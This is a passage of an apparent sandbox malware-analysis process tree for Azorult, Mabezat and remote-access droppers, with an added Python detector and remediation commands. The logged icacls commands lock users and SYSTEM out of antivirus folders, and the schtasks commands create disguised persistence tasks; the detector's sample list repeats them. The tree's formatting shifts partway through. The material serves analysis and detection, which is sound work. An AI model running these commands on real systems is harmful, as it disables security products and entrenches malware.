      - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 1212)
    command line: C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
    - System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 5616)
      command line: icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
      - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 916)
    command line: C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 4152)
      command line: icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
      - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 5184)
    command line: C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 1396)
      command line: icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
      - Modifies file permissions
      - System Location Discovery: System Language Discovery

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 1876)
    command line: C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 5136)
      command line: icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
      - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 1220)
    command line: C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 1380)
      command line: icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
      - Modifies file permissions

  C:\Windows\SysWOW64\cmd.exe  (depth 3, PID 1748)
    command line: C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
    C:\Windows\SysWOW64\icacls.exe  (depth 4, PID 3136)
      command line: icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
      - Modifies file permissions
  C:\Windows\SysWOW64\schtasks.exe  (depth 3, PID 1940)
    command line: "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task

  C:\Windows\SysWOW64\schtasks.exe  (depth 3, PID 5508)
    command line: "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
    - Scheduled Task/Job: Scheduled Task
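The netsh, icacls and schtasks children above are the defence-evasion and persistence stage of this run. Read together: outbound allow rules for AppModule.exe and AMD.exe under C:\ProgramData\WindowsTask; inbound allow rules for the drops under C:\ProgramData\rundll, C:\ProgramData\RealtekHD and C:\ProgramData\windows and for TCP 9393 and 9494; explicit deny ACEs for the interactive user (the cmd.exe parents pass %username%, which cmd expands to Admin before icacls runs) and, separately, for SYSTEM on the install and data folders of roughly twenty security products, with (OI)(CI) making each deny inherit to every file and subfolder; and two scheduled tasks whose names sit under the built-in Microsoft\Windows task folder and whose actions run from C:\ProgramData (taskhostw.exe every minute, winlogon.exe at logon with /RL HIGHEST; both are names of real Windows binaries that live in System32, not ProgramData). Two caveats when reading the signature tags: "Event Triggered Execution: Netsh Helper DLL" is attached to every netsh.exe here, but the command lines only add firewall rules and show no helper-DLL registration; and C:\Windows\svchost.exe is not where Windows keeps svchost.exe (that is System32), so the ACL there protects a planted file, not an OS component.

The following is an added example and is not part of the sandbox report: a Python script that parses command lines of exactly this shape (constructed below from the tree; in production they would come from Sysmon Event ID 1 or Security event 4688 CommandLine fields), classifies each into one of the three patterns, and emits the real netsh, icacls and schtasks command that reverses it. The vendor keyword list and the user-writable roots are assumptions to adjust for your own estate; the tokenizer is hand-written because shlex applies POSIX backslash escaping and would mangle Windows paths.

```python
"""Classify the netsh / icacls / schtasks command lines from the process tree
above. Input is a constructed list of command-line strings copied from the
tree; in production they would come from Sysmon Event ID 1 or Security 4688."""
import re
from dataclasses import dataclass

# Roots a dropper running as the user can write to (far more suspicious than Program Files).
USER_WRITABLE = ("c:\\programdata\\", "c:\\users\\", "\\appdata\\", "\\temp\\")
# Vendor/tool names taken from the icacls targets in the tree (assumption: extend for your estate).
SECURITY_PRODUCTS = ("malwarebytes", "mb3install", "adwcleaner", "bytefence", "kvrt", "360", "spyhunter",
                     "comodo", "enigma software", "avast", "avg", "norton", "kaspersky", "doctor web",
                     "grizzly", "cezurity", "mcafee", "avira", "eset", "panda security", "windows defender")
ACE_RE = re.compile(r"\(([A-Z]+)\)")            # icacls flags, e.g. (OI)(CI)(F)
TOKEN_RE = re.compile(r'(?:[^\s"]+|"[^"]*")+')   # one Windows argv token, quotes included

@dataclass
class Finding:
    rule: str          # which detection fired
    detail: str        # evidence taken from the command line
    remediation: str   # command that reverses the change (real netsh/icacls/schtasks syntax)

def win_split(cmdline):
    """Whitespace-split honouring double quotes; backslashes stay literal
    (shlex applies POSIX escaping and would mangle C:\\ paths)."""
    return [m.group().replace('"', "") for m in TOKEN_RE.finditer(cmdline)]

def unwrap(t):
    """Drop a leading 'cmd.exe /c' so parent and child lines parse identically
    (the parent still shows %username%, the child the expanded account name)."""
    return t[2:] if len(t) > 2 and t[0].lower().endswith("cmd.exe") and t[1].lower() == "/c" else t

def check_netsh(t):
    if [x.lower() for x in t[1:5]] != ["advfirewall", "firewall", "add", "rule"]:
        return None
    kv = {k.lower(): v for k, _, v in (x.partition("=") for x in t[5:])}
    if kv.get("action", "").lower() != "allow":
        return None
    name, prog, port, d = kv.get("name", "?"), kv.get("program", ""), kv.get("localport"), kv.get("dir", "").lower()
    fix = f'netsh advfirewall firewall delete rule name="{name}"'
    if any(s in prog.lower() for s in USER_WRITABLE):
        return Finding("firewall_allow_userwritable", f'rule "{name}" dir={d} program={prog}', fix)
    if port and d == "in":
        return Finding("firewall_open_inbound_port", f'rule "{name}" {kv.get("protocol", "?")}/{port} inbound', fix)
    return None

def check_icacls(t):
    # icacls <path> /deny <principal>:(inheritance)(rights)
    low = [x.lower() for x in t]
    if "/deny" not in low:
        return None
    path, spec = t[1], t[low.index("/deny") + 1]
    principal, _, rights = spec.partition(":")
    flags = ACE_RE.findall(rights)   # e.g. ['OI', 'CI', 'F']
    scope = "inherits to all children" if {"OI", "CI"} <= set(flags) else "this object only"
    fix = f'icacls "{path}" /remove:d {principal}'   # /remove:d strips only the deny ACEs for that principal
    if principal.lower() in ("system", "nt authority\\system"):
        return Finding("acl_deny_system", f"{path}: deny {flags} to SYSTEM ({scope})", fix)
    if any(v in path.lower() for v in SECURITY_PRODUCTS):
        return Finding("acl_deny_security_product", f"{path}: deny {flags} to {principal} ({scope})", fix)
    return None

def check_schtasks(t):
    low = [x.lower() for x in t]
    if "/create" not in low:
        return None
    opt = {low[i]: t[i + 1] for i in range(1, len(t) - 1)
           if low[i].startswith("/") and not t[i + 1].startswith("/")}
    tn, tr = opt.get("/tn", "?"), opt.get("/tr", "")
    why = [msg for hit, msg in (
        (any(s in tr.lower() for s in USER_WRITABLE), "action in user-writable path"),
        (opt.get("/sc", "").lower() == "minute" and opt.get("/mo", "1") == "1", "re-runs every minute"),
        (opt.get("/rl", "").lower() == "highest", "runs with highest privileges"),
        (tn.lower().startswith("microsoft\\windows\\"), "hidden in the built-in Microsoft\\Windows task folder"),
    ) if hit]
    return Finding("scheduled_task_persistence", f"{tn} -> {tr}: " + ", ".join(why),
                   f'schtasks /delete /TN "{tn}" /F') if why else None

CHECKS = {"netsh": check_netsh, "icacls": check_icacls, "schtasks": check_schtasks}

def analyse(cmdlines):
    """Return one Finding per command line that matches a tamper/persistence pattern."""
    findings = []
    for line in cmdlines:
        t = unwrap(win_split(line))
        tool = t[0].rsplit("\\", 1)[-1].lower().removesuffix(".exe") if t else ""
        f = CHECKS[tool](t) if tool in CHECKS else None
        if f:
            findings.append(f)
    return findings

# Constructed sample: lines copied from the tree above, plus one benign rule that must not fire.
SAMPLE = [
    r'C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes',
    r'netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN',
    r'netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out',
    r'C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)',
    r'icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)',
    r'icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)',
    r'icacls c:\programdata\Malwarebytes /deny System:(F)',
    r'"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1',
    r'"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST',
    r'netsh advfirewall firewall add rule name="Benign" dir=in action=allow program="C:\Program Files\App\app.exe" enable=yes',
]
```

Calling analyse(SAMPLE) yields eight findings: the outbound-only AllowPort3 rule and the Program Files rule are left alone, both the %username% parent and the expanded Admin child are caught for the Malwarebytes folder, and the two SYSTEM denies are reported separately because a deny on SYSTEM is what actually stops the product's services, not the deny on the user. The remediation strings use /remove:d so that only the deny ACEs go and the product's own grants are kept; run them from an elevated prompt, and delete the firewall rules and tasks before removing the dropped binaries so nothing re-spawns in between.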
C:\Users\Admin\Downloads\Azorult.exe  (depth 2, PID 4676)
  command line: "C:\Users\Admin\Downloads\Azorult.exe"
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 2, PID 4828)
  command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7968,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5652 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 2, PID 5880)
  command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --always-read-main-dll --field-trial-handle=5292,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7192 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 2, PID 5620)
  command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --always-read-main-dll --field-trial-handle=2720,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5480 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 2, PID 5600)
  command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5452,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7068 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 2, PID 5540)
  command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8052,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5124 /prefetch:8
C:\Users\Admin\Downloads\Mabezat.exe  (depth 2, PID 5236)
  command line: "C:\Users\Admin\Downloads\Mabezat.exe"
  - Executes dropped EXE

C:\Users\Admin\Downloads\Mabezat.exe  (depth 2, PID 5400)
  command line: "C:\Users\Admin\Downloads\Mabezat.exe"
  - Executes dropped EXE
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 2, PID 224)
  command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6308,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=4568 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 2, PID 220)
  command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --always-read-main-dll --field-trial-handle=5184,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7112 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 2, PID 652)
  command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --always-read-main-dll --field-trial-handle=7996,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6940 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 2, PID 3044)
  command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --always-read-main-dll --field-trial-handle=1220,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6352 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 2, PID 2200)
  command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --always-read-main-dll --field-trial-handle=5488,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6080 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 2, PID 4312)
  command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --always-read-main-dll --field-trial-handle=3484,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7008 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 2, PID 3008)
  command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --always-read-main-dll --field-trial-handle=5240,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7196 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 2, PID 5132)
  command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --always-read-main-dll --field-trial-handle=7176,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5396 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 2, PID 5128)
  command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --always-read-main-dll --field-trial-handle=7024,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7984 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 2, PID 2168)
  command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --always-read-main-dll --field-trial-handle=8256,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5524 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 2, PID 1212)
  command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8232,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8200 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 2, PID 1220)
  command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --always-read-main-dll --field-trial-handle=8200,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8924 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 2, PID 5544)
  command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --always-read-main-dll --field-trial-handle=6524,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8312 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 2, PID 2364)
  command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --always-read-main-dll --field-trial-handle=9164,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7096 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 2, PID 4668)
  command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --always-read-main-dll --field-trial-handle=8148,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=9108 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 2, PID 1168)
  command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --always-read-main-dll --field-trial-handle=7444,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7948 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 2, PID 220)
  command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --always-read-main-dll --field-trial-handle=6156,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5396 /prefetch:1
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --always-read-main-dll --field-trial-handle=6100,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8236 /prefetch:12⤵PID:2196
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --always-read-main-dll --field-trial-handle=1972,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8892 /prefetch:12⤵PID:5728
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8536,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8532 /prefetch:82⤵PID:4184
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=9192,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6012 /prefetch:82⤵PID:5128
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8828,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=9012 /prefetch:82⤵PID:5712
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8828,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=9012 /prefetch:82⤵PID:3720
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --always-read-main-dll --field-trial-handle=7976,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8936 /prefetch:12⤵PID:5596
-
-
C:\Users\Admin\Downloads\Mabezat.exe"C:\Users\Admin\Downloads\Mabezat.exe"2⤵
- Executes dropped EXE
PID:5060
-
-
C:\Users\Admin\Downloads\Mabezat.exe"C:\Users\Admin\Downloads\Mabezat.exe"2⤵
- Executes dropped EXE
PID:5324
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8864,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8116 /prefetch:82⤵PID:5396
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --always-read-main-dll --field-trial-handle=8572,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8808 /prefetch:12⤵PID:1280
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --always-read-main-dll --field-trial-handle=8616,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8884 /prefetch:12⤵PID:4320
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7140,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8288 /prefetch:82⤵PID:3972
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7984,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8360 /prefetch:82⤵PID:1412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:1436
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1324 -ip 13241⤵PID:5348
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 5768 -ip 57681⤵PID:1040
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 4184 -ip 41841⤵PID:5616
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 5144 -ip 51441⤵PID:5352
-
C:\ProgramData\Windows\rutserv.exe
PID: 6124
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx

  C:\ProgramData\Windows\rfusclient.exe
  PID: 5284
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses

    C:\ProgramData\Windows\rfusclient.exe /tray
    PID: 4344
    - Executes dropped EXE
    - Suspicious behavior: SetClipboardViewer

  C:\ProgramData\Windows\rfusclient.exe /tray
  PID: 1472
  - Executes dropped EXE

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
PID: 4912

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
PID: 2708

C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe
PID: 5400

  C:\ProgramData\RealtekHD\taskhostw.exe
  PID: 5808
  - Executes dropped EXE

C:\Windows\System32\svchost.exe -k NetworkService -s TermService
PID: 4348
- Suspicious use of AdjustPrivilegeToken

C:\Windows\System32\svchost.exe -k NetworkService -s TermService
PID: 1844
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken

C:\Programdata\RealtekHD\taskhostw.exe
PID: 2296
- Executes dropped EXE

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
PID: 3696

C:\Windows\system32\OpenWith.exe -Embedding
PID: 708
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx

